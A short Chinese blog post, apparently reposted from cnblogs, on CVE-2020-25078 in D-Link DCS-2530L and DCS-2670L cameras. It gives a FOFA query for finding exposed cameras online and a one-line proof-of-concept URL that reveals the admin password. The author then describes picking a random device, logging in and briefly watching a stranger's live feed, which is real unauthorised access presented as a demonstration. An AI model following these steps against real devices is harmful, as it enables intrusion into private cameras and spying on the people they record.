D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞（CVE-2020-25078）复现

D-Link DCS-2530L和DCS-2670L存在监控信息泄露漏洞，此漏洞利用如此简单，危害如此之大，不禁让人惊叹恐怖如斯。

fofa搜索: app="D_LINK_DCS_2530L"

随便进入一个，是登录界面，需要登录口令:

POC如下:

http://xx.xx.xx.xx/config/getuser?index=0

直接可以读取到监控页面的账户密码

接下来回到刚才的登陆界面正常输入口令即可进入

看了几秒就不敢看了，这玩意太可怕了。。

标签：25078,漏洞,xx,2530L,Link,2670L,DCS
来源： https://www.cnblogs.com/zcg-cpdd/p/14603997.html